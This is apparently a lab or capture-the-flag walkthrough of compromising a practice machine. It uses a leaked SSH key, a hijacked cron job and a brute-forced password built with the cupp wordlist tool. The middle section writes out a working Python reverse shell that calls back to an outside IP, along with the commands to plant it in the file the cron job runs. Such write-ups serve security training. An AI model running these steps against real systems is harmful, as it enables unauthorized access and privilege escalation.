NETWORK
SCAN
ENUMERATION
HTTP port 80
FOOTHOLD
SSH access as Martin
Looking into the files on the server, we have found a ssh private key
using this private ssh key, we were able to access the server as user Martin
SSH access as Jimmy
Looking into the crontab, we have found the following
somehow, the file in the crontab didn’t exist
creating the missing file with a reverse shell payload
touch /tmp/sekurity.py
echo '#!/usr/bin/python' > /tmp/sekurity.py
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.155",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> /tmp/sekurity.py
chmod +x /tmp/sekurity.py
gives us access to the server as user Jimmy
PRIV ESCALATION
Brute force Hadi account
We couldn’t find anything that could help us root the machine. Now we use the third the user to root the machine. We know that the third user is hadi. So we create a dictionary using this name.
We use cupp to create a dictionary.
SSH as Hadi
Using Hadi credentials (found in the previous step) we were able to access the SSH with admin permissions